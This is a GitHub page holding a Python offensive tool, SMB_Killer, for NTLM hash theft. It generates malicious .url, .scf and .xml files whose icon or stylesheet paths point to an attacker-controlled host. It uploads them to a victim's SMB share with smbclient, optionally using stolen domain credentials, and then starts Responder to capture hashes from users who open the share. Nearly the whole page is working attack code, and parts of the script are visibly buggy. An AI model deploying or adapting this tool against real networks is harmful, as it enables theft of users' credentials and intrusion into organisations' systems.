forked from overgrowncarrot1/SMB_Killer
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSMB_Killer.py
146 lines (130 loc) · 5.51 KB
/
SMB_Killer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
#!/usr/bin/env python3
import os
import argparse
import sys
import time
from colorama import Fore
RED = Fore.RED
YELLOW = Fore.YELLOW
GREEN = Fore.GREEN
MAGENTA = Fore.MAGENTA
BLUE = Fore.BLUE
RESET = Fore.RESET
parser = argparse.ArgumentParser(description="SMB Killer",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = argparse.ArgumentParser(description="SMB Killer", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-r", "--RHOST", action="store", help="RHOST")
parser.add_argument("-l", "--LHOST", action="store", help="LHOST")
parser.add_argument("-d", "--DOMAIN", action="store", help="LPORT")
parser.add_argument("-i", "--Interface", action="store", help="LPORT")
parser.add_argument("-a", "--Share", action="store", help="Share Name")
parser.add_argument("-o", "--Other", action="store", help="Other share if not in root folder")
parser.add_argument("-U", "--Username", action="store", help="Username")
parser.add_argument("-P", "--Password", action="store", help="Password")
parser.add_argument("-u", "--url", action="store_true", help="URL File")
parser.add_argument("-s", "--scf", action="store_true", help="SCF File")
parser.add_argument("-x", "--xml", action="store_true", help="XML File")
parser.add_argument("-A", "--All", action="store_true", help="Send up all files (URL, SCF and XML)")
args = parser.parse_args()
RHOST = args.RHOST
LHOST = args.LHOST
DOMAIN = args.DOMAIN
INTERFACE = args.Interface
SHARE = args.Share
USERNAME = args.Username
PASSWORD = args.Password
URL = args.url
SCF = args.scf
XML = args.xml
ALL = args.All
OTHER = args.Other
parser.parse_args(args=None if sys.argv[1:] else ['--help'])
if (SCF == None and URL == None and XML == None and ALL == None):
print(YELLOW+"What do you want from me!!!"+RESET)
parser.print_help()
sys.exit()
if (USERNAME != None and PASSWORD == None):
print(RED+"Need password if utilizing a username"+RESET)
def url():
print(YELLOW+"Making @evil.url \n"+RESET)
f = open("@evil.url", "w")
template = f"""[InternetShortcut]\n
URL=whatever\n
WorkingDirectory=whatever\n
IconFile=\\\\"""+LHOST+"""\\%USERNAME%.icon\n
IconIndex=1"""
f.write(template)
time.sleep(1)
print(GREEN+"Putting file into smb server, responder will automatically start \n"+RESET)
def scf():
print(YELLOW+"Making @evil.scf \n"+RESET)
f = open("@evil.scf", "w")
template= f"""[Shell]\n
Command=2\n
IconFile=\\\\"""+LHOST+"""\\tools\\nc.ico\n
[Taskbar]\n
Command=ToggleDesktop"""
f.write(template)
print(GREEN+"Putting file into smb server and starting Responder \n "+RESET)
def xml():
print(YELLOW+"Making @evil.xml \n"+RESET)
f = open("@evil.xml", "w")
template= f"""("<?xml version='1.0' encoding='UTF-8' standalone='yes'?>\n"
"<?mso-application progid='Word.Document'?>\n"
"<?xml-stylesheet type='text/xsl' href='\\\\"""+LHOST+"""\\evil.xsl' ?>")"""
f.write(template)
print(GREEN+"Putting file into smb server, once done exit out of SMB Server and responder will automatically start \n"+RESET)
def URL_File():
if (USERNAME != None and PASSWORD != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -U """+DOMAIN+"""/"""+USERNAME+"""%"""+PASSWORD+""" -c 'put @evil.url'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c '; cd '"""+OTHER+"""' ; put @evil.url'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER == None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c 'put @evil.url'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
def SCF_File():
if (USERNAME != None and PASSWORD != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -U """+DOMAIN+"""/"""+USERNAME+"""%"""+PASSWORD+""" -c 'put @evil.scf'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c '; cd '"""+OTHER+"""' ; put @evil.scf'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER == None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c 'put @evil.scf'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
def XML_File():
if (USERNAME != None and PASSWORD != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -U """+DOMAIN+"""/"""+USERNAME+"""%"""+PASSWORD+""" -c 'put @evil.xml'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c '; cd '"""+OTHER+"""' ; put @evil.xml'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER == None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c 'put @evil.xml'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
def ALL():
if (USERNAME != None and PASSWORD != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -U """+DOMAIN+"""/"""+USERNAME+"""%"""+PASSWORD+""" -c 'put @evil.xml; put @evil.scf; put @evil.url'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER != None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c '; cd '"""+OTHER+"""' ; put @evil.xml; put @evil.url; put @evil.scf'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if (OTHER == None):
os.system("""smbclient //"""+RHOST+"""/"""+SHARE+""" -c 'put @evil.xml; put @evil.url; put @evil.scf'""")
os.system("""sudo responder -I """+INTERFACE+""" -wv""")
if args.url == True:
url()
URL_File()
if args.scf == True:
scf()
SCF_File()
if args.xml == True:
xml()
XML_File()
if args.All == True:
xml()
url()
scf()
ALL()